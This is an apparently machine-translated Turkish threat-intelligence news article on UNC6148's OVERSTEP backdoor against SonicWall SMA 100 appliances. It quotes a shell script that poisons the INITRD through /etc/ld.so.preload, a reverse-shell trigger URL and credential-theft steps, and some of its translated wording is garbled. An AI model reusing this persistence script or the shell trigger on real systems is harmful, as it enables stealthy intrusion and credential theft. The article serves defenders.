Araştırmacılar, aşırı adım adı verilen sofistike bir arka kapı ile şüpheli bir sıfır gün uzaktan kodu yürütme kusurunu birleştiren gizli bir kampanya ortaya çıkardıktan sonra Sonicwall’un Yaşam Sonu SMA 100 Serisi aletleri yine ön cephede.
Finansal olarak motive edilen grup UNC6148’e atfedilen işlem, önce yönetici kimlik bilgilerini ve tek seferlik-password tohumlarını çalıyor, daha sonra verileri pessiltratlamadan ve fidye yazılımı dağıtımına hazırlanmadan önce tam cihaz uzlaşmasını değiştiriyor.
Saldırı zinciri, nihayetinde düşmana cihaza bir kabuk veren bir HTTP istekleri patlaması ile başlar – normal koşullar altında imkansız olması gereken bir eylem.
Google Tehdit İstihbarat Analistleri, kabuk aktif olduktan sonra, davetsiz misafirin cihazın yapılandırmasını ihraç ettiğini, sessizce kötü niyetli kurallar enjekte ettiğini ve kalıcı olarak baz 64 kodlu bir ikili yüklediğini belirtti. /cf bölüm.
İkili daha sonra kopyalanır /usr/lib/libsamba-errors.so.6 ve her işlemde kuvvet yüklü /etc/ld.so.preloadaktör kök seviyesi erişimini anında cihaza vermek.
Müfettişler, ilk dayanağı, suç forumlarında rutin olarak işlem gören uzun süredir devam eden SMA güvenlik açıklarından birine bağladılar.
Tablo 1, son üç yılda ilgili kampanyalar tarafından kullanılan doğrudan kod yürütme veya kimlik bilgisi hırsızlığı yolları sağlayan en alakalı hataları özetlemektedir.
| CVE | Yıl | Auth? | Tip | Kilit etki | Yama durumu |
|---|---|---|---|---|---|
| CVE-2021-20038 | 2021 | HAYIR | Hafıza Yolsuzluğu RCE | Keyfi Kodu Yetkisiz Yetersiz Yeter | Yamalı Temmuz 2021 |
| CVE-2024-38475 | 2024 | HAYIR | Yolun geçişi | Çöplük temp.db & & persist.db Şifreleri ve OTP tohumlarını çalmak için |
Yamalı Şubat 2025 |
| CVE-2021-20035 | 2021 | Evet | Komut enjeksiyonu | RCE /cgi-bin/sitecustomization işleyici |
Yamalı Nisan 2021 |
| CVE-2021-20039 | 2021 | Evet | Komut enjeksiyonu | RCE /cgi-bin/viewcert Abyss fidye yazılımına bağlı işleyici |
Yamalı Mayıs 2021 |
| CVE-2025-32819 | 2025 | Evet | Dosya silme | Yerleşik yönetici şifresini sıfırlar password |
Yamalı Haziran 2025 |
Tarafından yürütülen kabuk komutları dopasswords Command, abartılı olarak kimlik bilgisi veritabanlarını web ile hazırlıklı bir katran arşivine nasıl sıkıştırdığını ve saldırgan tarafından zahmetsiz indirilmesini sağlayarak tasvir eder.
Kalıcılık Taktikleri: Önyükleme sırasını ele geçirme
Taban sabitlendikten sonra, UNC6148 çimentoları yeniden yazarak kalıcılık bootCurrentFirmware() Rutin İçinde /etc/rc.d/rc.fwboot.
Değiştirilmiş komut dosyası, cihazın sıkıştırılmış ilk RAM diskini monte eder (INITRD), truva atma kütüphanesini bitkiler ve yeniden yazıyor INITRD.GZ Böylece haydut kodu herhangi bir meşru hizmetten önce yüklenir.
Bir zaman damgası “dokunma” işlemi dosya tarihlerini resmi çekirdek görüntüsü ile hizalayarak hızlı meta veri kontrollerini sinirlendirir.
# Extract and poison INITRD
gzip -d $fwLoc/INITRD.GZ
mount -o loop $fwLoc/INITRD $fwLoc/zzz
cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/
echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload
umount $fwLoc/zzz && gzip $fwLoc/INITRD
mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ
/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`"
/usr/local/sbin/kexec -eCihaz yeniden başlatıldığında, günlüğe kaydedilmesinden sorumlu web sunucusu da dahil olmak üzere her dinamik ikili, kötü amaçlı kitaplığa karşı bağlantılar.
Aşırı aşı kancaları open*– readdir*Ve write varlığını gizlemek ve dizeler için gelen tamponları ayrıştırmak için dobackshell veya dopasswords.
Tek bir http böyle olsun https://device/query?q=dobackshell,1.2.3.4,4444 Kaçırılanların içinde yürütülen bellek içi günlük kurcalama sayesinde disk günlüklerine dokunmadan ters bir kabuğu tetikler write Arama.
Sonuç, esnek bir dayanaktır: çalınan kimlik bilgileri geçerli kaldığı sürece tamamen yamalı cihazlar bile yeniden konumlandırılabilir.
Google’ın analistleri, savunucuları çevrimdışı görüntü disklerini döndürmeye, her şifreyi ve OTP tohumunu döndürmeye ve /etc/ld.so.preload; SMA donanımındaki varlığı “uzlaşma ile eşdeğer” dir.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.